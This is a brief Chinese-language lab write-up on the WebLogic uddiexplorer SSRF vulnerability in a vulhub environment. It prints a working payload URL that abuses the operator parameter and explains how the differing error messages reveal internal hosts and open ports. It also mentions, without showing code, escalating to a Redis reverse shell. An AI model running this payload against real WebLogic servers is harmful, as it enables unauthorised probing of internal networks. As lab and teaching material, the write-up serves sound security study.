@TOC
1.环境
环境
https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md
这个搭环境很方便快捷,具体可以看说明,很简单
2.原理
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
访问http://ip:7001/uddiexplorer/
,无需登录即可查看uddiexplorer
3.影响版本
4.利用过程
环境打开
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
,直接访问
payload:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
加入url
http://10.77.0.130:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
`
关键点是operator这个参数
- 可访问的端口将会得到错误,访问7001端口时返回一个404的状态码。
- 修改为一个不存在的端口,将会返回
could not connect over HTTP to server
存在
不存在
内网端口探测
我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放。这里有一个地方需要注意的是,需要知道目标内网网段。如果盲目的去进行网段扫描会耗费大量的时间。
实战挖掘中发现这个位置有可能会泄露内网网段。
实战存在的情况
注入HTTP头,利用Redis反弹shell
下一遍分开写吧,是可以的